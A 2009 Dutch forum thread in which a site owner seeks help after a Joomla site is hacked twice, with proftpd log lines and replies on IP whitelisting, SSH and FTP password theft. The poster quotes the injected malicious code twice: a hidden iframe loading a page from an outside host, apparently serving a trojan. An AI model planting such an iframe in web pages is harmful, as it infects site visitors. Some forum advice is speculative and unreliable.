Vraagje ; Is het mogelijk om ip's de toegang te blocken? Dus dat bijvoorbeeld 123.43.454.11 niet mag inloggen/kan inloggen met dat IP.
Beter nog ; is het mogelijk om te zeggen dat er bv maar 3 ip's mogen inloggen op de ftp server?
En de rest dus gewoon niet.
quote:Nou, vertel maar hoe danOp zondag 9 augustus 2009 20:45 schreef ibaneX het volgende:
Ja dit kan!
dan moet je dat opstarten... op F1 drukken en dan zoeken naar IP access...
quote:Op dit moment wordt dreamweaver gebruikt.Op zondag 9 augustus 2009 20:47 schreef Netsplitter het volgende:
Ja, maar dat hangt ook helemaal af van de software die gebruikt wordt.
quote:??Op zondag 9 augustus 2009 20:49 schreef Qwea het volgende:
[..]
Op dit moment wordt dreamweaver gebruikt.
Je kan met dreamweaver geen ftp server draaien.
quote:Op zondag 9 augustus 2009 20:48 schreef Elmostyle het volgende:
ik neem aan dat je je webserver op Unix draait? wat voor firewall software gebruik je?
Ja, draait unix. Firewall software geen id.. het is geen eigen webserver maar van een host. Ik zal ook even gelijk wat duidelijker zijn.
MM zn website is tot 2x toe nu gehackt. Het is geen password wat in een textbook voorkomt, dus hoe ze binnen komen mag god weten. Ze proberen een iframe in te laten laden die naar een site verwijst met ws een trojan horse
En het zijn *kijkt in log* een stuk of 20 proxy ip's.. en als we die bannen, pakken ze andere... ik wil dus eigenlijk een soort van "mac filter" maar dan met ip adressen die dus mogen inloggen op de server
quote:Ik dacht het ftp programmaOp zondag 9 augustus 2009 20:49 schreef Netsplitter het volgende:
[..]
??
Je kan met dreamweaver geen ftp server draaien.
Unix wordt gedraait door de host
quote:Als ze in je site een iframe kunnen aanroepen, zit er een fout in je PHP/ASP code. aangezien ze je variabelen wijzigen vanaf afstand.Op zondag 9 augustus 2009 20:51 schreef Qwea het volgende:
[..]
Ja, draait unix. Geen firewall software.. enkel een router. Althans, ik neem aan dat je bedoelt van de verbinding hier he? Ik zal ook even gelijk wat duidelijker zijn.
MM zn website is tot 2x toe nu gehackt. Het is geen password wat in een textbook voorkomt, dus hoe ze binnen komen mag god weten. Ze proberen een iframe in te laten laden die naar een site verwijst met ws een trojan horse
En het zijn *kijkt in log* een stuk of 20 proxy ip's.. en als we die bannen, pakken ze andere... ik wil dus eigenlijk een soort van "mac filter" maar dan met ip adressen die dus mogen inloggen op de server
Of zie je in je FTP Access logs ook echt dat ze files aanpassen? Weet je wel dat je FTP Server wel up-to-date is?
Verder heb je wel firewall software nodig wil je het blokkeren. aangezien je bij een simpele router meestal alleen een algemene blacklist hebt, en niet alleen voor specifieke poorten.
quote:ww is net aangepast... maar het ww is geen ww wat je dmv een prog makkelijk kraakt.Op zondag 9 augustus 2009 20:53 schreef -_Tommy_- het volgende:
aha, dan moet je dat regelen met de host! jij kan het waarschijnlijk niet aanpassen! of je moet je wachtwoord wat moeilijker maken!
Maar er bestaat dus niet zoiets als een htaccess bestand hiervoor?
quote:Stukje uit de root log die ik net van de host heb gehad ;Op zondag 9 augustus 2009 20:54 schreef Elmostyle het volgende:
[..]
Als ze in je site een iframe kunnen aanroepen, zit er een fout in je PHP/ASP code. aangezien ze je variabelen wijzigen vanaf afstand.
Of zie je in je FTP Access logs ook echt dat ze files aanpassen? Weet je wel dat je FTP Server wel up-to-date is?
Verder heb je wel firewall software nodig wil je het blokkeren. aangezien je bij een simpele router meestal alleen een algemene blacklist hebt, en niet alleen voor specifieke poorten.
Aug 9 20:31:13 s1 proftpd[26089]: s2.imtek.nl (::ffff:99.18.52.30[::ffff:99.18.52.30]) - Preparing to chroot to directory '/home/mmnl'
Aug 9 20:31:22 s1 proftpd[26091]: s2.imtek.nl (::ffff:216.208.154.184[::ffff:216.208.154.184]) - Preparing to chroot to directory '/home/mmnl'
Aug 9 20:31:29 s1 proftpd[26093]: s2.imtek.nl (::ffff:68.46.148.41[::ffff:68.46.148.41]) - Preparing to chroot to directory '/home/mmnl'
Aug 9 20:31:37 s1 proftpd[26110]: s2.imtek.nl (::ffff:87.21.112.83[::ffff:87.21.112.83]) - Preparing to chroot to directory '/home/mmnl'
En binnen 24u gewoon 825x inloggen
Er wordt trouwens joomla als cms gedraait door MM, maar die is gisteren na de 1ste hack geupdate.. maar dat hielp dus blijkbaar niet.
quote:Ze proberen in te loggen dmv SSH ipv FTP, daar is chrooten tenminste voor. Dus je zal ze op poort 22 moeten blocken ipv poort 21.Op zondag 9 augustus 2009 20:55 schreef Qwea het volgende:
[..]
Stukje uit de root log die ik net van de host heb gehad ;
Aug 9 20:31:13 s1 proftpd[26089]: s2.imtek.nl (::ffff:99.18.52.30[::ffff:99.18.52.30]) - Preparing to chroot to directory '/home/mmnl'
Aug 9 20:31:22 s1 proftpd[26091]: s2.imtek.nl (::ffff:216.208.154.184[::ffff:216.208.154.184]) - Preparing to chroot to directory '/home/mmnl'
Aug 9 20:31:29 s1 proftpd[26093]: s2.imtek.nl (::ffff:68.46.148.41[::ffff:68.46.148.41]) - Preparing to chroot to directory '/home/mmnl'
Aug 9 20:31:37 s1 proftpd[26110]: s2.imtek.nl (::ffff:87.21.112.83[::ffff:87.21.112.83]) - Preparing to chroot to directory '/home/mmnl'
En binnen 24u gewoon 825x inloggen
Er wordt trouwens joomla als cms gedraait door MM, maar die is gisteren na de 1ste hack geupdate.. maar dat hielp dus blijkbaar niet.
Beschik je over een SSH account bij je hosting? anders zou je die evt. toch kunnen laten blokkeren indien je die toch niet gebruikt.
Verder .htaccess helpt niet, dat is alleen voor acties op poort 80
quote:Qwea | No time for sleeping zegt (20:58):Op zondag 9 augustus 2009 20:57 schreef Elmostyle het volgende:
[..]
Ze proberen in te loggen dmv SSH ipv FTP, daar is chrooten tenminste voor. Dus je zal ze op poort 22 moeten blocken ipv poort 21.
Beschik je over een SSH account bij je hosting? anders zou je die evt. toch kunnen laten blokkeren indien je die toch niet gebruikt.
Verder .htaccess helpt niet, dat is alleen voor acties op poort 80
beschikt MM over een ssh account?
dat vroegen ze zich in het topic op fok af:+
Imtek zegt (20:59):
niet naar mijn weten
Qwea | No time for sleeping zegt (20:59):
okido
Imtek zegt (20:59):
[root@s1 ~]# cat /etc/passwd | grep mmnl
mmnl:x:516:517::/home/mmnl:/bin/false
nein
quote:Laat je host hun firewall maar eens fatsoenlijk configureren, want daar zit dan zeker weten een fout in.Op zondag 9 augustus 2009 20:59 schreef Qwea het volgende:
[..]
Qwea | No time for sleeping zegt (20:58):
beschikt MM over een ssh account?
dat vroegen ze zich in het topic op fok af:+
Imtek zegt (20:59):
niet naar mijn weten
Qwea | No time for sleeping zegt (20:59):
okido
Imtek zegt (20:59):
[root@s1 ~]# cat /etc/passwd | grep mmnl
mmnl:x:516:517::/home/mmnl:/bin/false
nein
quote:Op zondag 9 augustus 2009 21:07 schreef Elmostyle het volgende:
[..]
Laat je host hun firewall maar eens fatsoenlijk configureren, want daar zit dan zeker weten een fout in.
quote:Mijn host is nu wegQwea | No time for sleeping zegt (21:02):
zeg, kun jij als host niet iets blocken waardoor dit niet voor kan komen? Als in, enkel bepaalde ip
ip's de toegang geven en de rest niet? Ik roep maar wat hoor!
Imtek zegt (21:03):
ehmm... nee niet zoals het nu staat
ze konden er gewoon in
en niet legitieme logins (waarvan het passwd) niet klopt
worden wel gebblocked
Username wordt morgen ook aangepast. Ben benieuwd
dit is wel klote elke x <iframe src="http://zdlz.in:8080/index.php" width=173 height=148 style="visibility: hidden"></iframe>
En op de 1 of andere manier doen ze denk ik ook iets niet goed, want elke x dat ze het aanpassen zit er een parse error op line 90.
En volgens mij laad het iframe niet eensquote:hm vaagOp zondag 9 augustus 2009 21:11 schreef Qwea het volgende:
Trouwens, stukje uit de broncode van wat hun hebben aangepast ;
<iframe src="http://zdlz.in:8080/index.php" width=173 height=148 style="visibility: hidden"></iframe>
En op de 1 of andere manier doen ze denk ik ook iets niet goed, want elke x dat ze het aanpassen zit er een parse error op line 90.
iig FTP of SSH toegang hebben ze, of een fout in de SSH of FTP Software.
quote:wss niet neeOp zondag 9 augustus 2009 21:21 schreef Qwea het volgende:
Hmm, nou dan gaat dat wachtwoord veranderen van MM ws ook niet helpen
quote:weet niet waar jij ziet dat ze ssh toegang hebben hoor?Op zondag 9 augustus 2009 21:15 schreef Elmostyle het volgende:
[..]
hm vaag
hij kan niet eens inloggen via ssh
quote:voor even maar...Op zondag 9 augustus 2009 21:21 schreef Qwea het volgende:
Hmm, nou dan gaat dat wachtwoord veranderen van MM ws ook niet helpen
daarna wordt deze weer gebrute forced...
quote:staat hier helemaal los van.Op zondag 9 augustus 2009 21:07 schreef Elmostyle het volgende:
[..]
Laat je host hun firewall maar eens fatsoenlijk configureren, want daar zit dan zeker weten een fout in.
quote:Je pakt het verkeerd aan. Als je een goed (sterk) wachtwoord gebruikt en je site wordt ook na een wijziging van het wachtwoord tóch weer gehackt, dan is dat een indicatie dat één of meer van de computers die je voor het updaten van je site gebruikt is besmet en je FTP wachtwoorden doorstuurt naar de hackers. Lees hier maar even hoe dat kan. Dát probleem (die besmetting van je PC) moet je dus eerst oplossen.Op zondag 9 augustus 2009 20:54 schreef Qwea het volgende:
[..]
ww is net aangepast... maar het ww is geen ww wat je dmv een prog makkelijk kraakt.
Maar er bestaat dus niet zoiets als een htaccess bestand hiervoor?
quote:editOp zondag 9 augustus 2009 21:52 schreef Riparius het volgende:
[..]
Je pakt het verkeerd aan. Als je een goed (sterk) wachtwoord gebruikt en je site wordt ook na een wijziging van het wachtwoord tóch weer gehackt, dan is dat een indicatie dat één of meer van de computers die je voor het updaten van je site gebruikt is besmet en je FTP wachtwoorden doorstuurt naar de hackers. Lees hier maar even hoe dat kan. Dát probleem (die besmetting van je PC) moet je dus eerst oplossen.
Misschien off-topic, maar zitten jullie allemaal bij de zelfde host?
quote:neeOp maandag 10 augustus 2009 10:42 schreef Ezechielk het volgende:
Goeie vraag, even volgen. Momenteel ben ik gelukkig nog vrij gebleven van dergelijke perikelen, maar wie weet wat me te wachten staat.
Misschien off-topic, maar zitten jullie allemaal bij de zelfde host?
quote:Nee, dat regel ik zelf..Op maandag 10 augustus 2009 10:42 schreef Ezechielk het volgende:
Goeie vraag, even volgen. Momenteel ben ik gelukkig nog vrij gebleven van dergelijke perikelen, maar wie weet wat me te wachten staat.
Misschien off-topic, maar zitten jullie allemaal bij de zelfde host?